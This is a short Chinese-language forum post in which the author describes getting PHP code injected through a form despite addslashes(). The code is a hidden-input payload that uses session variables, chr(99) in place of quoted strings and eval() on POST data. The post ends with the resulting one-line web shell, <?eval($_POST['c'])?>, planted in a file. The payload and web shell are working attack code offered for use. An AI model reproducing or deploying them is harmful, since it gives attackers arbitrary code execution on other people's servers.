前面一篇帖子的问题得到解决,在form提交表单中,因为addslashes()会在注入字符前加单引号,所以使用stripslashes()干掉!!!
不过是使用我不会的session弄的,大家看看
<input name='c' type=hidden value="session_start();$_SESSION[chr(99) ]=get_magic_quotes _gpc()?$_SESSION[$_POST[chr(100)]]:$_POST[chr(100)];eval($_SESSION[chr(99)]); ">
就这句犯了很多错误 ,
1、最后eval($_SSESSION[chr(99)])写成这样,没有在末尾加分号!!!
2、get_magic_quotes_gpc()总结的单词quotes拼写错误!!!!
3、用chr(99)代替字符C,以避免使用引号!!!
最后结果是!!!!!
插入单文件中代码:
<?eval($_POST['c'])?>